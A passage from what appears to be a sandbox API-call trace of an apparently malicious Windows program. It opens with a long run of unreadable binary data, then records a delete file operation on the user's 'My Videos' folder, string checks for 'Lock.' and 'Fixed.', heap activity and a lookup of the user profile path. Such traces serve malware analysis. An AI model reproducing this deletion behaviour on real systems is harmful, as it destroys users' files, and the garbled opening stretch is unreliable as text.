⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\Documents\\My Videos", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0219.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854380 | out: hHeap=0x2af0000) returned 1 [0219.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0219.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0219.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0219.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0219.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0219.582] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0219.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0219.582] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0219.582] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0219.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0219.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0219.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0219.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0219.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0219.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0219.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0219.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0219.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0219.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0219.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0219.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0219.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0219.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Outlook Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0219.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="utlook Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0219.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tlook Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0219.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="look Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0219.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ook Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0219.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ok Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0219.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0219.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0219.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0219.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0219.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0219.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0219.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0219.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0219.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0219.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0219.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0219.583] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0219.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0219.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0219.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0219.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0219.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0219.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0219.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0219.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0219.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0219.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0219.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0219.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0219.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0219.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0219.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0219.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0219.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0219.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0219.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1c) returned 0x2a77ee0 [0219.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0219.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Outlook Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0219.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="utlook Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0219.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tlook Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0219.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="look Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0219.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ook Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0219.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ok Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0219.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0219.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Files", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0219.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0219.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0219.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0219.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0219.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0219.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0219.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0219.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0219.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0219.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0219.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0219.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0219.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0219.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0219.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0219.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0219.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0219.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0219.585] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0219.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0219.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0219.585] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0219.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0219.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0219.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0219.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72378 [0219.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0219.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0219.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0219.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0219.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0219.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0219.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0219.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0219.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0219.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0219.586] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0219.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0219.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0219.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab098 [0219.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0219.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0219.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaff0 [0219.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0219.586] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0219.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0219.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0219.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0219.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0219.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0219.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0219.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0219.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0219.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0219.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0219.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0219.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0219.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0219.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0219.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0219.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0219.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854dd0 [0219.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0219.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0219.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0219.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | 